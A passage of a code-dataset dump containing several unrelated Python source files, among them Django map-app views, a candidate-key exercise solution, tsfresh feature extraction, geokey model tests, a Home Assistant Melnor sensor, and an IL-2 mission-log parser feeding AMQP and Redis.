59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "twisted.internet.task.react", "line_number": 119, "usage_type": "call"}, {"api_name": "twisted.internet.defer.ensureDeferred", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "194413387", "text": "from django.conf import settings\nfrom django.core.serializers import serialize\nfrom django.http import JsonResponse, HttpResponse\nfrom django.http.response import HttpResponseForbidden, HttpResponseBadRequest\nfrom django.views.generic.base import TemplateView, View\nfrom django.urls import reverse\nfrom django.core.cache import cache\n\nfrom map.models import District, PhotoTimor, IstoriaViazen, CommentPhoto\n\nclass VueView(TemplateView):\n template_name = 'vue_ui/index.html'\n\n def get_context_data(self, *args, **kwargs):\n context = {\n 'urls': dict(\n openstreetmap=settings.OPENSTREETMAP_URL,\n geojson=reverse(\"api_geojson\"),\n images=reverse(\"api_images\"),\n commentphoto=reverse(\"api_commentphoto\"),\n istoriaviazen=reverse(\"api_istoriaviazen\"),\n login=reverse(\"api_login\"),\n add_journey=reverse(\"api_add_istoria\"),\n add_comment=reverse(\"api_add_comment\"),\n media_url=settings.MEDIA_URL,\n )\n }\n return context\n\nclass AddIstoriaView(View):\n def 
post(self, request, *args, **kwargs):\n istoria = IstoriaViazen.objects.create(\n title=request.POST[\"title\"],\n description=request.POST[\"description\"],\n duration_of_trip=(request.POST[\"fromDate\"], request.POST[\"toDate\"]),\n creator=request.user,\n )\n response_data = {\n \"istoria\": istoria.to_json(),\n \"photos\": [],\n }\n for photo_file in self.request.FILES.getlist('photos'):\n photo = PhotoTimor.objects.create(istoriaviazen=istoria, image=photo_file)\n response_data[\"photos\"].append(photo.to_json())\n\n return JsonResponse(response_data)\n\ndef login_api(request):\n if request.user.is_authenticated:\n response = JsonResponse(\n {'name': request.user.get_full_name()\n })\n else:\n response = HttpResponse(status=401, reason=\"You need to login\")\n return response\n\ndef geojson_api(request):\n geojson = cache.get('api_geojson')\n if geojson == None:\n geojson = serialize('geojson', District.objects.all(), geometry_field='geom')\n cache.set('api_geojson', geojson)\n response = HttpResponse(geojson, content_type=\"application/json\")\n return response\n\ndef images_api(request):\n images = [\n p.to_json()\n for p in PhotoTimor.objects.all().select_related(\"istoriaviazen\", \"istoriaviazen__creator\")\n ]\n response = JsonResponse(images, safe=False)\n return response\n\ndef istoriaviazen_api(request):\n viazen = [\n v.to_json()\n for v in IstoriaViazen.objects.all().select_related('creator')\n ]\n response = JsonResponse(viazen, safe=False)\n return response\n\ndef commentphoto_api(request):\n comment = [\n c.to_json()\n for c in CommentPhoto.objects.filter(is_public=True).select_related('user')\n ]\n response = JsonResponse(comment, safe=False)\n return response\n\n\nclass AddCommentView(View):\n def post(self, request, *args, **kwargs):\n\n if \"comments\" not in request.POST:\n return HttpResponseBadRequest()\n\n if \"phototimor\" not in request.POST:\n return HttpResponseForbidden()\n\n http_x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if http_x_forwarded_for:\n ip_address = http_x_forwarded_for.split(',')[0]\n else:\n ip_address = request.META.get('REMOTE_ADDR')\n\n comment = CommentPhoto.objects.create(\n phototimor=PhotoTimor.objects.get(id=request.POST[\"phototimor\"]),\n comment=request.POST[\"comments\"],\n ip_address=ip_address,\n user=request.user,\n )\n response_data = {\n \"comment\": comment.to_json(),\n }\n return JsonResponse(response_data)\n\n\n", "sub_path": "vue_ui/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3897, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.generic.base.TemplateView", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.OPENSTREETMAP_URL", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 25, 
"usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "django.views.generic.base.View", "line_number": 30, "usage_type": "name"}, {"api_name": "map.models.IstoriaViazen.objects.create", "line_number": 32, "usage_type": "call"}, {"api_name": "map.models.IstoriaViazen.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "map.models.IstoriaViazen", "line_number": 32, "usage_type": "name"}, {"api_name": "map.models.PhotoTimor.objects.create", "line_number": 43, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "map.models.PhotoTimor", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.core.cache.cache.get", "line_number": 58, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 58, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 60, "usage_type": "call"}, {"api_name": "map.models.District.objects.all", "line_number": 60, "usage_type": "call"}, {"api_name": "map.models.District.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "map.models.District", "line_number": 60, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 61, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 61, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects.all", "line_number": 68, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "map.models.PhotoTimor", "line_number": 68, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "map.models.IstoriaViazen.objects.all", "line_number": 76, "usage_type": "call"}, {"api_name": "map.models.IstoriaViazen.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "map.models.IstoriaViazen", "line_number": 76, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "map.models.CommentPhoto", "line_number": 84, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 86, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 90, "usage_type": "name"}, {"api_name": "django.http.response.HttpResponseBadRequest", "line_number": 94, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseForbidden", "line_number": 97, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects.create", "line_number": 105, "usage_type": "call"}, {"api_name": "map.models.CommentPhoto.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "map.models.CommentPhoto", "line_number": 105, "usage_type": "name"}, {"api_name": "map.models.PhotoTimor.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "map.models.PhotoTimor.objects", "line_number": 106, 
"usage_type": "attribute"}, {"api_name": "map.models.PhotoTimor", "line_number": 106, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "42417144", "text": "# combinations 아이디어까지는 잘 떠올렸으나\n# 중복제거 부분을 생각못해버렸네\n# 다시 풀어보자\nfrom itertools import combinations\ndef solution(relation):\n\n nR = len(relation)\n nC = len(relation[0])\n\n candi = []\n for i in range(1,nC+1) :\n candi.extend(combinations(range(nC),i))\n \n ans = []\n for keys in candi :\n tmp = [tuple([val[key] for key in keys]) for val in relation]\n if len(set(tmp)) == nR :\n ans.append(keys)\n \n ret = set(ans)\n for i in range(len(ans)) :\n for j in range(i+1,len(ans)) :\n if len(ans[i]) == len(set(ans[i]).intersection(ans[j])) :\n ret.discard(ans[j])\n\n return len(ret)\n\n\n\nrelation = [[\"100\",\"ryan\",\"music\",\"2\"],\n [\"200\",\"apeach\",\"math\",\"2\"],\n [\"300\",\"tube\",\"computer\",\"3\"],\n [\"400\",\"con\",\"computer\",\"4\"],\n [\"500\",\"muzi\",\"music\",\"3\"],\n [\"600\",\"apeach\",\"music\",\"2\"]]\n\n\nprint(solution(relation))\n", "sub_path": "programmers/kakao/LEVEL2_후보키.py", "file_name": "LEVEL2_후보키.py", "file_ext": "py", "file_size_in_byte": 1006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "itertools.combinations", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "174465801", "text": "import pandas as pd\r\nfrom tsfresh.utilities.dataframe_functions import impute\r\nfrom tsfresh import extract_features\r\n\r\n\r\ndef handle_y(y):\r\n y = y.drop_duplicates(subset=['id', 'y'], keep='first')\r\n y = y.reset_index(drop=True)\r\n y = y.iloc[:, -1]\r\n\r\n return y\r\n\r\n\r\n# 有效特征\r\ndef get_features(file_name, count):\r\n csv_data = pd.read_csv(file_name)\r\n timeseries = csv_data.iloc[:, :-1]\r\n del timeseries['Unnamed: 0']\r\n y = csv_data[['id', 'y']]\r\n y = handle_y(y)\r\n\r\n print(timeseries)\r\n print(y)\r\n\r\n print('start getfeatures...')\r\n # 全部特征\r\n extracted_features = extract_features(timeseries, column_id=\"id\", column_sort=\"time\")\r\n impute(extracted_features)\r\n extracted_features.to_csv('tsfresh_extractedFeatures' + str(count) + '.csv')\r\n print(str(count) + ' end')\r\n\r\n\r\ndef get_features_thread():\r\n _error = []\r\n\r\n for i in range(0, 30):\r\n try:\r\n temp = 'control_data_' + str(i) + '.csv'\r\n get_features(temp, i)\r\n except Exception:\r\n print(str(i) + ' is error')\r\n _error.append(str(i))\r\n\r\n for i in range(30, 111):\r\n try:\r\n temp = 'patient_data_' + str(i) + '.csv'\r\n get_features(temp, i)\r\n except Exception:\r\n print(str(i) + ' is error')\r\n _error.append(str(i))\r\n\r\n print(_error)\r\n\r\ndef start():\r\n get_features_thread()\r\n", "sub_path": "features/alpha1_110/thread_cal_features.py", "file_name": "thread_cal_features.py", "file_ext": "py", "file_size_in_byte": 1416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "tsfresh.extract_features", "line_number": 27, "usage_type": "call"}, {"api_name": "tsfresh.utilities.dataframe_functions.impute", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "15437428", "text": "from django.test import TestCase\n\nfrom oauth2_provider.models import AccessToken\nfrom geokey.applications.tests.model_factories import ApplicationFactory\n\nfrom .model_factories import UserGroupF, UserF\nfrom ..models 
import UserGroup\n\n\nclass UserTest(TestCase):\n def test_reset_password(self):\n user = UserF.create()\n app = ApplicationFactory.create()\n AccessToken.objects.create(\n user=user,\n application=app,\n token='df0af6a395b4cd072445b3832e9379bfee257da0',\n scope=1,\n expires='2030-12-31 23:59'\n )\n\n user.reset_password('123456')\n\n self.assertEqual(0, AccessToken.objects.filter(user=user).count())\n\n\nclass UserGroupPreSaveSignalTest(TestCase):\n def test_contribute_and_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_moderate = True\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertTrue(ref_group.can_contribute)\n self.assertTrue(ref_group.can_moderate)\n\n def test_not_contribute_and_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_contribute = False\n usergroup.can_moderate = True\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertTrue(ref_group.can_contribute)\n self.assertTrue(ref_group.can_moderate)\n\n def test_contribute_and_not_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_contribute = True\n usergroup.can_moderate = False\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertTrue(ref_group.can_contribute)\n self.assertFalse(ref_group.can_moderate)\n\n def test_not_contribute_and_not_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_contribute = False\n usergroup.can_moderate = False\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertFalse(ref_group.can_contribute)\n self.assertFalse(ref_group.can_moderate)\n", "sub_path": "geokey/users/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 2119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 10, "usage_type": "name"}, {"api_name": "model_factories.UserF.create", "line_number": 12, "usage_type": "call"}, {"api_name": "model_factories.UserF", "line_number": 12, "usage_type": "name"}, {"api_name": "geokey.applications.tests.model_factories.ApplicationFactory.create", "line_number": 13, "usage_type": "call"}, {"api_name": "geokey.applications.tests.model_factories.ApplicationFactory", "line_number": 13, "usage_type": "name"}, {"api_name": "oauth2_provider.models.AccessToken.objects.create", "line_number": 14, "usage_type": "call"}, {"api_name": "oauth2_provider.models.AccessToken.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "oauth2_provider.models.AccessToken", "line_number": 14, "usage_type": "name"}, {"api_name": "oauth2_provider.models.AccessToken.objects.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "oauth2_provider.models.AccessToken.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "oauth2_provider.models.AccessToken", "line_number": 24, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 27, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 29, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 29, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 34, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 34, "usage_type": "name"}, {"api_name": 
"model_factories.UserGroupF.create", "line_number": 39, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 39, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 45, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 50, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 50, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 56, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 61, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 61, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 67, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "480325595", "text": "\"\"\"Sensor support for Melnor Bluetooth water timer.\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Callable\nfrom dataclasses import dataclass\nfrom typing import Any\n\nfrom melnor_bluetooth.device import Device\n\nfrom homeassistant.components.sensor import (\n SensorDeviceClass,\n SensorEntity,\n SensorEntityDescription,\n SensorStateClass,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import PERCENTAGE, SIGNAL_STRENGTH_DECIBELS_MILLIWATT\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import EntityCategory\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import StateType\n\nfrom .const import DOMAIN\nfrom .models import MelnorBluetoothBaseEntity, MelnorDataUpdateCoordinator\n\n\n@dataclass\nclass MelnorSensorEntityDescriptionMixin:\n \"\"\"Mixin for required keys.\"\"\"\n\n state_fn: Callable[[Device], Any]\n\n\n@dataclass\nclass MelnorSensorEntityDescription(\n SensorEntityDescription, MelnorSensorEntityDescriptionMixin\n):\n \"\"\"Describes Melnor sensor entity.\"\"\"\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_devices: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the sensor platform.\"\"\"\n\n coordinator: MelnorDataUpdateCoordinator = hass.data[DOMAIN][config_entry.entry_id]\n\n sensors: list[MelnorSensorEntityDescription] = [\n MelnorSensorEntityDescription(\n device_class=SensorDeviceClass.BATTERY,\n entity_category=EntityCategory.DIAGNOSTIC,\n key=\"battery\",\n name=\"Battery\",\n native_unit_of_measurement=PERCENTAGE,\n state_class=SensorStateClass.MEASUREMENT,\n state_fn=lambda device: device.battery_level,\n ),\n MelnorSensorEntityDescription(\n device_class=SensorDeviceClass.SIGNAL_STRENGTH,\n entity_category=EntityCategory.DIAGNOSTIC,\n entity_registry_enabled_default=False,\n key=\"rssi\",\n name=\"RSSI\",\n native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS_MILLIWATT,\n state_class=SensorStateClass.MEASUREMENT,\n state_fn=lambda device: device.rssi,\n ),\n ]\n\n async_add_devices(\n MelnorSensorEntity(\n coordinator,\n description,\n )\n for description in sensors\n )\n\n\nclass 
MelnorSensorEntity(MelnorBluetoothBaseEntity, SensorEntity):\n \"\"\"Representation of a Melnor sensor.\"\"\"\n\n entity_description: MelnorSensorEntityDescription\n\n def __init__(\n self,\n coordinator: MelnorDataUpdateCoordinator,\n entity_description: MelnorSensorEntityDescription,\n ) -> None:\n \"\"\"Initialize a sensor for a Melnor device.\"\"\"\n super().__init__(coordinator)\n\n self._attr_unique_id = f\"{self._device.mac}-{entity_description.key}\"\n\n self.entity_description = entity_description\n\n @property\n def native_value(self) -> StateType:\n \"\"\"Return the battery level.\"\"\"\n return self.entity_description.state_fn(self._device)\n", "sub_path": "homeassistant/components/melnor/sensor.py", "file_name": "sensor.py", "file_ext": "py", "file_size_in_byte": 3124, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.abc.Callable", "line_number": 31, "usage_type": "name"}, {"api_name": "melnor_bluetooth.device.Device", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 27, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntityDescription", "line_number": 36, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 34, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 42, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 43, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity_platform.AddEntitiesCallback", "line_number": 44, "usage_type": "name"}, {"api_name": "models.MelnorDataUpdateCoordinator", "line_number": 48, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 48, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass.BATTERY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass", "line_number": 52, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity.EntityCategory.DIAGNOSTIC", "line_number": 53, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.entity.EntityCategory", "line_number": 53, "usage_type": "name"}, {"api_name": "homeassistant.const.PERCENTAGE", "line_number": 56, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorStateClass.MEASUREMENT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorStateClass", "line_number": 57, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass.SIGNAL_STRENGTH", "line_number": 61, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass", "line_number": 61, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity.EntityCategory.DIAGNOSTIC", "line_number": 62, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.entity.EntityCategory", "line_number": 62, "usage_type": "name"}, {"api_name": "homeassistant.const.SIGNAL_STRENGTH_DECIBELS_MILLIWATT", "line_number": 66, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorStateClass.MEASUREMENT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorStateClass", "line_number": 67, "usage_type": "name"}, {"api_name": "models.MelnorBluetoothBaseEntity", "line_number": 81, "usage_type": "name"}, 
{"api_name": "homeassistant.components.sensor.SensorEntity", "line_number": 81, "usage_type": "name"}, {"api_name": "models.MelnorDataUpdateCoordinator", "line_number": 88, "usage_type": "name"}, {"api_name": "homeassistant.helpers.typing.StateType", "line_number": 99, "usage_type": "name"}]} +{"seq_id": "451467815", "text": "import tarfile\nfrom itertools import chain\nimport pandas as pd\n\n\ndef csv_parser(filename):\n \"\"\"Extract CSV data from TAR.GZ file.\n\n Extracts all CSV files from a TAR.GZ archive and combines them into a list\n of dictionary objects.\n :param filename: Name of the filename to parse\n \"\"\"\n entries = list()\n with tarfile.open(filename) as tar:\n for member in tar:\n # Only CSV files are interesting\n if not member.name.endswith('.csv'):\n continue\n\n # Read the CSV\n csv_data = pd.read_csv(tar.extractfile(member))\n entries = chain(entries, csv_data.to_dict('records'))\n\n return list(entries)\n", "sub_path": "custom_parser/tar_gz_csv.py", "file_name": "tar_gz_csv.py", "file_ext": "py", "file_size_in_byte": 686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tarfile.open", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "68140319", "text": "#!/usr/bin/env python\n\nimport os\nimport sys\nimport time\nimport re\nimport amqp\nimport pickle\nimport redis\nimport pprint\n\nfrom types import MappingProxyType\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nfrom lib.il2_stats.constants import COALITION_ALIAS\nfrom lib.il2_stats.statuses import BotLifeStatus, SortieStatus, LifeStatus\nfrom lib.il2_stats.helpers import distance, point_in_polygon, is_pos_correct\nfrom lib.il2_stats.parse_mission_log_line import *\nfrom lib.il2_stats.report import *\n# from lib.il2_stats.models import (Object, Mission, Sortie, Profile, Player, PlayerAircraft, VLife,\n#\t\t\t\t\t\t PlayerMission, KillboardPvP, Tour, LogEntry, Score, Squad)\n# from lib.il2_stats.models import Object\nfrom util.config import *\n\nclass MissionReportParser:\n\tdef __init__(self):\n\t\tif checkConfig() == -1: return None \n\t\tself.config = openConfig()\n\n\t\tself.logsPath = self.config['gamePath'] + '\\\\data\\\\logs\\\\text'\n\t\tself.observer = Observer()\n\n\tdef run(self):\n\t\tevent_handler = MissionReportHandler(self.logsPath)\n\t\tself.observer.schedule(event_handler, self.logsPath, recursive=False)\n\t\tself.observer.start()\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\ttime.sleep(1)\n\t\texcept KeyboardInterrupt:\n\t\t\tself.observer.stop()\n\t\tself.observer.join()\n\n\tdef stop(self):\n\t\tself.observer.stop()\n\t\tself.observer.join()\n\nclass MissionReportHandler(FileSystemEventHandler):\n\tdef __init__(self, logsPath):\n\t\tif checkConfig() == -1: return None \n\t\tself.config = openConfig()\n\n\t\tself.logsPath = logsPath\n\t\tself.connectAMQP()\n\t\tself.db = redis.Redis(host='localhost', port=6379, db=0)\n\t\tself.create_objects()\n\t\tself.mission = MissionReport(self.objects)\n\n\tdef create_objects(self):\n\t\tself.objects = {}\n\t\tscore_dict = {}\n\t\t# Parses the score file\n\t\twith open('lib\\\\il2_stats\\\\csv\\\\score.csv',encoding='utf-8') as file_csv:\n\t\t\tfor row in csv.DictReader(file_csv):\n\t\t\t\tscore_dict[row['key'].lower()] = {\n\t\t\t\t\t'type': row['type'], \n\t\t\t\t\t'value': 
row['value']\n\t\t\t\t}\n\t\t# Parses the object file\n\t\twith open('lib\\\\il2_stats\\\\csv\\\\objects.csv', encoding='utf-8') as file_csv:\n\t\t\tfor row in csv.DictReader(file_csv):\n\t\t\t\tname_en = row['name'] or row['log_name']\n\t\t\t\tis_playable = bool(int(row['playable']))\n\t\t\t\tself.objects[row['log_name'].lower()] = {\n\t\t\t\t\t'name': name_en, \n\t\t\t\t\t'name_en': name_en, \n\t\t\t\t\t'name_ru': row['name_ru'],\n\t\t\t\t\t'score_id': score_dict[row['cls']], \n\t\t\t\t\t'is_playable': is_playable,\n\t\t\t\t\t'cls': row['cls']\n\t\t\t\t}\n\t\t# Parses the class file\t\t\n\t\twith open('lib\\\\il2_stats\\\\csv\\\\classes.csv', encoding='utf-8') as file_csv:\n\t\t\tfor row in csv.DictReader(file_csv):\n\t\t\t\tfor key in self.objects:\n\t\t\t\t\tif (self.objects[key]['cls'] == row['cls']):\n\t\t\t\t\t\tself.objects[key]['cls_base'] = row['cls_base']\n\n\tdef connectAMQP(self):\n\t\tself.c = amqp.Connection('localhost', exchange='libds')\n\t\tself.c.connect()\n\t\tself.events = self.c.channel()\n\n\tdef on_created(self, event):\n\t\tif event.is_directory:\n\t\t\treturn None\n\t\telif event.event_type == 'created':\n\t\t\tpath = event.src_path\n\t\t\tif 'missionReport' in path and '.txt' in path:\n\t\t\t\t# print('Mission Report created: ' + path)\n\t\t\t\tself.parseNewMissionReport(path)\n\n\tdef cleanDirectory(self, currentFile):\n\t\tfor p in os.listdir(self.logsPath):\n\t\t\tfullPath = os.path.join(self.logsPath, p)\n\t\t\tif os.path.isfile(fullPath) and fullPath != currentFile:\n\t\t\t\tos.remove(fullPath)\n\t\t\t\t\n\n\tdef parseNewMissionReport(self, path):\n\t\ttry:\n\t\t\t# Wait for the game to release the file\n\t\t\ttime.sleep(0.1)\n\n\t\t\tself.processEvents(path)\n\t\t\tself.mission.processing(path)\n\t\t\t# Cleanup and save to Redis\n\t\t\tself.cleanDirectory(path)\n\t\t\tself.db.set('report', pickle.dumps(self.mission))\n\t\texcept Exception as e:\n\t\t\tprint('parseNewMissionReport error', file=sys.stderr)\n\t\t\tprint(str(e), file=sys.stderr)\n\n\tdef processEvents(self, file):\n\t\twith open(file, 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tif 'AType' not in line:\n\t\t\t\t\tprint('ignored bad string: [{}]'.format(line))\n\t\t\t\t\tcontinue\n\t\t\t\ttry:\n\t\t\t\t\tdata = parse(line)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tprint('bad line: [{}]'.format(line.strip()), file=sys.stderr)\n\t\t\t\t\tcontinue\n\t\t\t\texcept UnexpectedATypeWarning:\n\t\t\t\t\tprint('unexpected atype: [{}]'.format(line))\n\t\t\t\t\tcontinue\n\t\t\t\t# Publishes each event to AMQP server\n\t\t\t\t# pprint.pprint(data)\n\t\t\t\tmsg = amqp.Message(json.dumps(data, default=str), content_type='application/json')\n\t\t\t\tself.events.basic_publish(msg, exchange='libds', routing_key='events')\n\nif __name__ == '__main__':\n\tmrParser = MissionReportParser()\n\tmrParser.run()\n\n# ROADMAP\n'''\n[X] Delete all other log files whenever a log file is created\n[ ] Clean MLG files\n'''", "sub_path": "MissionReporter.py", "file_name": "MissionReporter.py", "file_ext": "py", "file_size_in_byte": 4555, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "watchdog.observers.Observer", "line_number": 32, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "watchdog.events.FileSystemEventHandler", "line_number": 49, "usage_type": "name"}, {"api_name": "redis.Redis", "line_number": 56, "usage_type": "call"}, {"api_name": "amqp.Connection", "line_number": 91, "usage_type": 
"call"}, {"api_name": "os.listdir", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 120, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 122, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 123, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 134, "usage_type": "attribute"}, {"api_name": "amqp.Message", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "284204321", "text": "import os\nimport tempfile\nfrom pandas.testing import assert_frame_equal\n\nfrom tests.integration.fixtures import DaskTestCase\n\n\nclass CreateTestCase(DaskTestCase):\n def setUp(self):\n super().setUp()\n\n self.f = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())\n\n def tearDown(self):\n super().tearDown()\n\n if os.path.exists(self.f):\n os.unlink(self.f)\n\n def test_create_from_csv(self):\n self.df.to_csv(self.f, index=False)\n\n self.c.sql(\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n location = '{self.f}',\n format = 'csv'\n )\n \"\"\"\n )\n\n df = self.c.sql(\n 